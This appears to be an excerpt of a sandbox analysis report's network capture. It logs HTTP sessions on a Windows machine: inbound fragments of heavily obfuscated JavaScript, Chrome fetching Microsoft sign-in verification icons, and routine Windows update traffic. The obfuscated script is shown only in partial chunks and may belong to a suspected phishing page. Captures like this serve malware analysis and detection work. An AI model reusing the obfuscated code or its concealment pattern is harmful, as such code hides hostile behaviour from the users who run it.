2024-07-03 19:20:05 UTC	7345	IN	Data Raw: 64 66 62 28 30 78 32 38 35 2c 30 78 31 63 34 2c 30 78 32 39 35 2c 30 78 31 34 39 29 2b 5f 30 78 35 33 33 66 35 65 28 30 78 34 38 33 2c 30 78 34 34 61 2c 30 78 34 62 65 2c 30 78 34 66 65 29 2c 27 52 46 6b 53 65 27 3a 5f 30 78 35 33 33 66 35 65 28 30 78 34 39 39 2c 30 78 35 32 64 2c 30 78 35 33 37 2c 30 78 35 37 66 29 2b 27 61 67 65 27 2c 27 4f 59 71 6c 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 32 38 31 35 65 2c 5f 30 78 33 63 61 62 66 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 32 38 31 35 65 21 3d 3d 5f 30 78 33 63 61 62 66 36 3b 7d 2c 27 4f 4b 55 44 49 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 39 65 38 63 65 2c 5f 30 78 32 63 36 63 35 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 39 65 38 63 65 21 3d 3d 5f 30 78 32 63 36 63 35 35 3b 7d 2c 27 4f 56 46 Data Ascii: dfb(0x285,0x1c4,0x295,0x149)+_0x533f5e(0x483,0x44a,0x4be,0x4fe),'RFkSe':_0x533f5e(0x499,0x52d,0x537,0x57f)+'age','OYqlK':function(_0x52815e,_0x3cabf6){return _0x52815e!==_0x3cabf6;},'OKUDI':function(_0x19e8ce,_0x2c6c55){return _0x19e8ce!==_0x2c6c55;},'OVF
2024-07-03 19:20:05 UTC	8949	IN	Data Raw: 5f 30 78 36 62 34 64 35 63 3d 5f 30 78 31 64 36 39 65 62 5b 5f 30 78 34 38 63 64 61 64 28 30 78 34 33 62 2c 30 78 33 32 38 2c 30 78 33 30 36 2c 30 78 33 39 61 29 5d 28 5f 30 78 32 34 65 62 36 32 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 64 36 39 65 62 3d 6e 75 6c 6c 2c 5f 30 78 36 62 34 64 35 63 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 38 30 64 31 35 3d 21 5b 5d 2c 5f 30 78 31 31 62 30 30 62 3b 7d 7d 3b 7d 65 6c 73 65 20 5f 30 78 31 66 66 66 39 35 26 26 5f 30 78 33 35 37 30 34 39 28 5f 30 78 33 65 33 39 38 66 28 30 78 32 32 66 2c 30 78 32 39 66 2c 30 78 33 37 35 2c 30 78 33 31 39 29 2b 5f 30 78 33 65 33 39 38 66 28 30 78 31 37 31 2c 30 78 31 35 65 2c 30 78 32 33 30 2c 30 78 31 63 33 29 Data Ascii: _0x6b4d5c=_0x1d69eb[_0x48cdad(0x43b,0x328,0x306,0x39a)](_0x24eb62,arguments);return _0x1d69eb=null,_0x6b4d5c;}}:function(){};return _0x280d15=![],_0x11b00b;}};}else _0x1fff95&&_0x357049(_0x3e398f(0x22f,0x29f,0x375,0x319)+_0x3e398f(0x171,0x15e,0x230,0x1c3)
2024-07-03 19:20:05 UTC	8459	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 65 38 61 31 2c 5f 30 78 35 35 38 39 66 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 30 65 38 61 31 3d 3d 5f 30 78 35 35 38 39 66 63 3b 7d 2c 27 54 74 75 72 48 27 3a 5f 30 78 32 65 32 39 33 32 28 30 78 31 38 33 2c 30 78 32 33 65 2c 30 78 32 30 61 2c 30 78 31 63 31 29 2c 27 43 6b 4d 59 71 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 36 33 62 35 2c 5f 30 78 32 34 63 31 33 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 30 36 33 62 35 28 5f 30 78 32 34 63 31 33 66 29 3b 7d 2c 27 53 6f 72 71 64 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 36 35 61 61 2c 5f 30 78 36 66 38 34 64 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 30 36 35 61 61 28 5f 30 78 36 66 38 34 64 34 29 3b 7d 2c 27 6e 43 64 5a 73 27 3a 5f 30 78 32 65 32 39 33 32 Data Ascii: unction(_0x20e8a1,_0x5589fc){return _0x20e8a1==_0x5589fc;},'TturH':_0x2e2932(0x183,0x23e,0x20a,0x1c1),'CkMYq':function(_0x2063b5,_0x24c13f){return _0x2063b5(_0x24c13f);},'Sorqd':function(_0x2065aa,_0x6f84d4){return _0x2065aa(_0x6f84d4);},'nCdZs':_0x2e2932
2024-07-03 19:20:05 UTC	8949	IN	Data Raw: 2c 27 41 68 6a 4c 7a 47 27 2c 27 75 4d 7a 6c 7a 4c 4b 27 2c 27 73 31 4c 41 7a 75 53 27 2c 27 45 65 44 70 7a 4d 47 27 2c 27 43 75 72 6b 75 4b 53 27 2c 27 42 67 39 4e 27 2c 27 45 67 4c 68 7a 66 75 27 2c 27 73 4e 76 6d 42 31 43 27 2c 27 72 30 35 48 73 33 69 27 2c 27 76 78 7a 32 71 76 75 27 2c 27 41 4e 44 67 75 65 57 27 2c 27 79 77 44 4c 27 2c 27 6c 4d 6a 30 42 49 31 4c 42 77 66 50 42 61 27 2c 27 7a 75 6a 62 42 76 65 27 2c 27 44 4d 66 53 41 77 71 27 2c 27 75 4b 39 6c 45 67 4f 27 2c 27 44 4e 76 64 72 76 79 27 2c 27 74 31 7a 67 76 65 6d 27 2c 27 7a 32 48 5a 42 31 79 27 2c 27 6c 4d 76 59 43 4d 39 59 6c 78 72 35 43 61 27 2c 27 43 4e 7a 33 43 33 43 27 2c 27 6d 5a 71 31 6d 64 75 30 44 75 58 7a 42 30 44 35 27 2c 27 75 32 72 68 79 4b 43 27 2c 27 73 68 48 63 76 68 75 Data Ascii: ,'AhjLzG','uMzlzLK','s1LAzuS','EeDpzMG','CurkuKS','Bg9N','EgLhzfu','sNvmB1C','r05Hs3i','vxz2qvu','ANDgueW','ywDL','lMj0BI1LBwfPBa','zujbBve','DMfSAwq','uK9lEgO','DNvdrvy','t1zgvem','z2HZB1y','lMvYCM9Ylxr5Ca','CNz3C3C','mZq1mdu0DuXzB0D5','u2rhyKC','shHcvhu
2024-07-03 19:20:05 UTC	8459	IN	Data Raw: 33 61 37 34 61 38 2c 5f 30 78 32 30 65 61 34 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 66 31 64 61 62 64 28 5f 30 78 62 66 61 66 31 34 2d 30 78 32 35 66 2c 5f 30 78 32 66 30 36 38 62 2d 30 78 39 33 2c 5f 30 78 33 61 37 34 61 38 2d 30 78 31 62 32 2c 5f 30 78 33 61 37 34 61 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 30 33 33 62 35 28 5f 30 78 33 38 35 32 61 64 2c 5f 30 78 31 31 30 63 36 66 2c 5f 30 78 34 63 64 62 38 64 2c 5f 30 78 61 34 61 31 66 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 66 31 64 61 62 64 28 5f 30 78 61 34 61 31 66 63 2d 30 78 32 62 66 2c 5f 30 78 31 31 30 63 36 66 2d 30 78 31 32 65 2c 5f 30 78 34 63 64 62 38 64 2d 30 78 31 62 38 2c 5f 30 78 34 63 64 62 38 64 29 3b 7d 69 66 28 5f 30 78 31 35 33 32 32 65 26 26 5f 30 78 32 39 33 61 34 64 5b Data Ascii: 3a74a8,_0x20ea41){return _0xf1dabd(_0xbfaf14-0x25f,_0x2f068b-0x93,_0x3a74a8-0x1b2,_0x3a74a8);}function _0x3033b5(_0x3852ad,_0x110c6f,_0x4cdb8d,_0xa4a1fc){return _0xf1dabd(_0xa4a1fc-0x2bf,_0x110c6f-0x12e,_0x4cdb8d-0x1b8,_0x4cdb8d);}if(_0x15322e&&_0x293a4d[
2024-07-03 19:20:05 UTC	8949	IN	Data Raw: 78 32 39 30 66 63 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 64 33 65 39 30 21 3d 3d 5f 30 78 32 39 30 66 63 37 3b 7d 2c 27 69 4a 4f 66 71 27 3a 5f 30 78 34 39 35 64 65 36 28 30 78 32 32 34 2c 30 78 31 64 38 2c 30 78 31 36 61 2c 30 78 31 61 63 29 2c 27 67 4d 69 71 54 27 3a 5f 30 78 34 30 63 35 64 33 28 2d 30 78 61 2c 2d 30 78 39 61 2c 2d 30 78 62 61 2c 2d 30 78 36 31 29 2c 27 4b 50 45 6c 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 64 64 37 38 38 2c 5f 30 78 31 38 33 38 37 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 64 37 38 38 28 5f 30 78 31 38 33 38 37 65 29 3b 7d 2c 27 52 49 56 4c 65 27 3a 5f 30 78 34 30 63 35 64 33 28 2d 30 78 38 35 2c 2d 30 78 31 33 32 2c 2d 30 78 64 35 2c 2d 30 78 38 32 29 2c 27 4b 6e 4d 4b 56 27 3a 5f 30 78 34 39 35 64 65 36 28 Data Ascii: x290fc7){return _0x2d3e90!==_0x290fc7;},'iJOfq':_0x495de6(0x224,0x1d8,0x16a,0x1ac),'gMiqT':_0x40c5d3(-0xa,-0x9a,-0xba,-0x61),'KPEle':function(_0x1dd788,_0x18387e){return _0x1dd788(_0x18387e);},'RIVLe':_0x40c5d3(-0x85,-0x132,-0xd5,-0x82),'KnMKV':_0x495de6(
2024-07-03 19:20:05 UTC	16384	IN	Data Raw: 2c 2d 30 78 32 36 33 2c 2d 30 78 32 36 61 29 2b 27 72 74 27 2c 27 73 4c 78 6c 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 65 64 66 62 64 2c 5f 30 78 65 39 35 38 33 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 65 64 66 62 64 28 5f 30 78 65 39 35 38 33 35 29 3b 7d 2c 27 5a 72 57 59 42 27 3a 5f 30 78 31 35 33 65 65 35 28 2d 30 78 31 38 64 2c 2d 30 78 32 62 39 2c 2d 30 78 32 34 33 2c 2d 30 78 32 61 64 29 2b 27 72 27 2c 27 74 77 41 6c 62 27 3a 5f 30 78 64 62 35 65 34 61 28 2d 30 78 35 62 2c 2d 30 78 31 63 30 2c 2d 30 78 31 32 66 2c 2d 30 78 64 36 29 2b 5f 30 78 64 62 35 65 34 61 28 2d 30 78 32 35 34 2c 2d 30 78 32 38 33 2c 2d 30 78 31 65 38 2c 2d 30 78 31 30 64 29 2b 5f 30 78 31 35 33 65 65 35 28 2d 30 78 31 36 31 2c 2d 30 78 31 31 33 2c 2d 30 78 63 33 2c 2d Data Ascii: ,-0x263,-0x26a)+'rt','sLxlo':function(_0x1edfbd,_0xe95835){return _0x1edfbd(_0xe95835);},'ZrWYB':_0x153ee5(-0x18d,-0x2b9,-0x243,-0x2ad)+'r','twAlb':_0xdb5e4a(-0x5b,-0x1c0,-0x12f,-0xd6)+_0xdb5e4a(-0x254,-0x283,-0x1e8,-0x10d)+_0x153ee5(-0x161,-0x113,-0xc3,-
2024-07-03 19:20:05 UTC	1514	IN	Data Raw: 36 39 2c 30 78 35 32 62 29 2b 5f 30 78 31 38 32 65 33 39 28 30 78 35 63 61 2c 30 78 36 31 32 2c 30 78 34 62 36 2c 30 78 35 34 36 29 2c 27 5a 45 73 48 78 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 32 39 39 63 34 2c 5f 30 78 32 31 61 33 37 31 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 33 64 33 39 64 28 5f 30 78 32 61 62 65 33 66 2c 5f 30 78 32 65 61 66 64 66 2c 5f 30 78 34 36 39 65 31 64 2c 5f 30 78 31 35 34 39 61 34 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 62 66 33 38 32 28 5f 30 78 31 35 34 39 61 34 2d 30 78 31 30 65 2c 5f 30 78 34 36 39 65 31 64 2c 5f 30 78 34 36 39 65 31 64 2d 30 78 35 31 2c 5f 30 78 31 35 34 39 61 34 2d 30 78 31 33 33 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 35 32 39 63 66 62 5b 5f 30 78 33 33 64 33 39 64 28 30 78 34 64 38 2c 30 78 34 Data Ascii: 69,0x52b)+_0x182e39(0x5ca,0x612,0x4b6,0x546),'ZEsHx':function(_0x3299c4,_0x21a371){function _0x33d39d(_0x2abe3f,_0x2eafdf,_0x469e1d,_0x1549a4){return _0x2bf382(_0x1549a4-0x10e,_0x469e1d,_0x469e1d-0x51,_0x1549a4-0x133);}return _0x529cfb[_0x33d39d(0x4d8,0x4
2024-07-03 19:20:05 UTC	8938	IN	Data Raw: 30 78 39 35 2c 5f 30 78 31 34 34 33 38 32 2c 5f 30 78 36 33 35 31 35 62 2d 30 78 31 63 39 2c 5f 30 78 31 34 34 33 38 32 2d 30 78 38 34 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 35 32 39 63 66 62 5b 5f 30 78 32 37 63 63 30 62 28 30 78 33 38 32 2c 30 78 34 35 62 2c 30 78 32 62 63 2c 30 78 33 38 35 29 5d 28 5f 30 78 35 38 33 63 38 63 2c 5f 30 78 31 30 31 66 64 30 29 3b 7d 2c 27 42 47 4c 71 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 35 30 32 37 2c 5f 30 78 33 62 61 37 61 34 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 66 30 39 66 32 28 5f 30 78 31 31 64 62 66 66 2c 5f 30 78 32 37 31 65 39 30 2c 5f 30 78 35 38 32 66 62 31 2c 5f 30 78 32 33 31 32 31 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 38 32 65 33 39 28 5f 30 78 31 31 64 62 66 66 2d 30 78 63 61 2c 5f 30 78 Data Ascii: 0x95,_0x144382,_0x63515b-0x1c9,_0x144382-0x84);}return _0x529cfb[_0x27cc0b(0x382,0x45b,0x2bc,0x385)](_0x583c8c,_0x101fd0);},'BGLqJ':function(_0x35027,_0x3ba7a4){function _0xf09f2(_0x11dbff,_0x271e90,_0x582fb1,_0x231216){return _0x182e39(_0x11dbff-0xca,_0x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	13.107.246.44	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:06 UTC	422	OUT	GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:06 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:06 GMT Content-Type: image/svg+xml Content-Length: 1173 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT ETag: 0x8D79B83749623C9 x-ms-request-id: 2439d381-c01e-0012-032b-cc03b8000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240703T192006Z-157bfc59976cs7dp68mf7de13s0000000eyg00000000durh x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-03 19:20:06 UTC	1173	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 56 cb 6e 24 37 0c fc 95 c1 e4 da ad 69 52 d4 2b b0 0d 4c 4e 39 ac 6f 41 0e b9 35 b2 b3 1e 03 8e bd b3 6e 78 f6 f3 53 14 a5 de 6c dc 86 dd 25 5b d4 83 2a 16 29 dd bc be 3d ec be ff f3 f4 fc 7a bb 3f 2f cb d7 5f 0f 87 eb f5 ea ae de bd 7c 7b 38 f0 34 4d 07 8c d8 ef ae 8f 9f 97 f3 ed 5e f2 7e 77 3e 3d 3e 9c 17 fb fb ed f1 74 fd ed e5 fb ed 7e da 4d 3b c9 f8 dd df dd 2c 8f cb d3 e9 6e 7e 7d 3d 2d af 37 07 fb ef e6 db e9 ef e5 a3 55 be 3c 3e 3d dd ee 9f 5f 9e 4f fb c3 dd cd d7 79 39 ef 3e df ee ef fd e4 84 79 e0 e2 a6 c2 b3 77 52 fc 60 38 e1 87 06 72 9e c5 71 24 f4 fa dc b1 db c8 b3 4b 52 2e ce c7 58 bf cc c9 a5 14 16 57 a4 b8 1c e4 e2 24 67 27 22 e8 20 57 3c cf c5 95 24 83 a1 2d e3 32 95 81 8e 18 12 68 30 34 83 4f 83 17 97 7c Data Ascii: uVn$7iR+LN9oA5nxSl%[*)=z?/_\|{84M^~w>=>t~M;,n~}=-7U<>=_Oy9>ywR`8rq$KR.XW$g'" W<$-2h04O\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	13.107.246.44	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:06 UTC	421	OUT	GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:06 UTC	799	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:06 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT ETag: 0x8D79B8374CE7F93 x-ms-request-id: c3d3c745-801e-0007-0c64-cdaf35000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240703T192006Z-157bfc59976km2zhyg5xsdxufn0000000f9g000000001rhn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-07-03 19:20:06 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	13.107.246.44	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:06 UTC	438	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:06 UTC	786	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:06 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 11 Mar 2022 11:11:29 GMT ETag: 0x8DA034FE445C10D x-ms-request-id: ebb61bf1-001e-007b-627e-cd81ca000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240703T192006Z-157bfc59976x49h5y0c5nkcgkn0000000exg00000000dpfu x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-07-03 19:20:06 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49745	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:06 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-03 19:20:06 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=74938 Date: Wed, 03 Jul 2024 19:20:06 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:07 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-03 19:20:07 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=74947 Date: Wed, 03 Jul 2024 19:20:07 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-03 19:20:07 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	52.165.165.26	443

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:13 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S5gvZ42ZN9G8uNw&MD=5pMyKrEA HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-03 19:20:13 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 97b8af43-1d9a-4edb-8333-02240edd4b2b MS-RequestId: 8a03c233-0e61-4c1b-9da1-8bb78910f5bf MS-CV: emkuLFc36EqxQ45F.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 03 Jul 2024 19:20:12 GMT Connection: close Content-Length: 24490
2024-07-03 19:20:13 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-03 19:20:13 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
